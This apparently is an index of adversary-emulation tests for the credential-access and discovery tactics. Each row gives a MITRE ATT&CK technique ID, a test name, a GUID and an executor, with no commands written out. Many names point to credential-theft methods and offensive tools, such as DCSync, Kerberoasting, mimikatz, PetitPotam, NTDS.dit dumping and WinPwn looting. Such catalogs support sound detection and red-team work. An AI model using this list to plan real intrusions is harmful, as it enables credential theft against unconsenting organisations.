1287 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
1288 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
1289 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
1290 credential-access T1552.001 Unsecured Credentials: Credentials In Files 7 WinPwn - sensitivefiles 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 powershell
1291 credential-access T1552.001 Unsecured Credentials: Credentials In Files 8 WinPwn - Snaffler fdd0c913-714b-4c13-b40f-1824d6c015f2 powershell
1292 credential-access T1552.001 Unsecured Credentials: Credentials In Files 9 WinPwn - powershellsensitive 75f66e03-37d3-4704-9520-3210efbe33ce powershell
1293 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
1294 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
1295 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1296 credential-access T1528 Steal Application Access Token 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1297 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1298 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1299 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1300 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1301 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
1302 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
1303 credential-access T1110.004 Brute Force: Credential Stuffing 3 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
1304 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
1305 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
1306 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
1307 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
1308 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
1309 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
1310 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1311 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1312 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
1313 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1314 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1315 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1316 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
1317 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
1318 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
1319 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1320 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1321 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1322 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1323 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1324 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
1325 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
1326 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
1327 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
1328 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
1329 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
1330 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1331 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
1332 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
1333 credential-access T1552.007 Kubernetes List Secrets 3 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
1334 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
1335 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
1336 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
1337 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
1338 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
1339 discovery T1033 System Owner/User Discovery 6 System Discovery - SocGholish whoami 3d257a03-eb80-41c5-b744-bb37ac7f65c7 powershell
1340 discovery T1613 Container and Resource Discovery 1 Container and ResourceDiscovery 8a895923-f99f-4668-acf2-6cc59a44f05e sh
1341 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
1342 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
1343 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
1344 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1345 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1346 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1347 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1348 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
1349 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
1350 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
1351 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
1352 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
1353 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
1354 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
1355 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
1356 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
1357 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
1358 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
1359 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
1360 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
1361 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
1362 discovery T1087.002 Account Discovery: Domain Account 17 Wevtutil - Discover NTLM Users Remote b8a563d4-a836-4993-a74e-0a19b8481bfe powershell
1363 discovery T1087.002 Account Discovery: Domain Account 18 Suspicious LAPS Attributes Query with Get-ADComputer all properties 394012d9-2164-4d4f-b9e5-acf30ba933fe powershell
1364 discovery T1087.002 Account Discovery: Domain Account 19 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property 6e85bdf9-7bc4-4259-ac0f-f0cb39964443 powershell
1365 discovery T1087.002 Account Discovery: Domain Account 20 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope ffbcfd62-15d6-4989-a21a-80bfc8e58bb5 powershell
1366 discovery T1087.002 Account Discovery: Domain Account 21 Suspicious LAPS Attributes Query with adfind all properties abf00f6c-9983-4d9a-afbc-6b1c6c6448e1 powershell
1367 discovery T1087.002 Account Discovery: Domain Account 22 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd 51a98f96-0269-4e09-a10f-e307779a8b05 powershell
1368 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
1369 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
1370 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
1371 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
1372 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
1373 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
1374 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
1375 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
1376 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
1377 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
1378 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
1379 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
1380 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
1381 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
1382 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
1383 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
1384 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
1385 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
1386 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
1387 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
1388 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
1389 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
1390 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
1391 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
1392 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
1393 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
1394 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
1395 discovery T1069.002 Permission Groups Discovery: Domain Groups 14 Active Directory Enumeration with LDIFDE 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 command_prompt
1396 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1397 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1398 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1399 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1400 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1401 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1402 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1403 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1404 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1405 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1406 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1407 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1408 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1409 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1410 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1411 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
1412 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
1413 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
1414 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
1415 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
1416 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
1417 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
1418 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
1419 discovery T1135 Network Share Discovery 9 Network Share Discovery via dir command 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 command_prompt
1420 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
1421 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
1422 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
1423 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
1424 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
1425 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
1426 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
1427 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
1428 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
1429 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
1430 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
1431 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
1432 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
1433 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
1434 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
1435 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
1436 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
1437 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
1438 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
1439 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
1440 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
1441 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
1442 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
1443 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
1444 discovery T1082 System Information Discovery 23 Azure Security Scan with SkyArk 26a18d3d-f8bc-486b-9a33-d6df5d78a594 powershell
1445 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
1446 discovery T1082 System Information Discovery 25 System Information Discovery with WMIC 8851b73a-3624-4bf7-8704-aa312411565c command_prompt
1447 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
1448 discovery T1580 Cloud Infrastructure Discovery 1 AWS - EC2 Enumeration from Cloud Instance 99ee161b-dcb1-4276-8ecb-7cfdcb207820 sh
1449 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
1450 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
1451 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
1452 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
1453 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
1454 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
1455 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
1456 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
1457 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
1458 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
1459 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
1460 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
1461 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
1462 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
1463 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
1464 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
1465 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
1466 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
1467 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
1468 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
1469 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
1470 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
1471 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
1472 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
1473 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
1474 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
1475 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
1476 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
1477 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
1478 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
1479 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
1480 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1481 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1482 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
1483 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1484 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
1485 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
1486 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1487 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
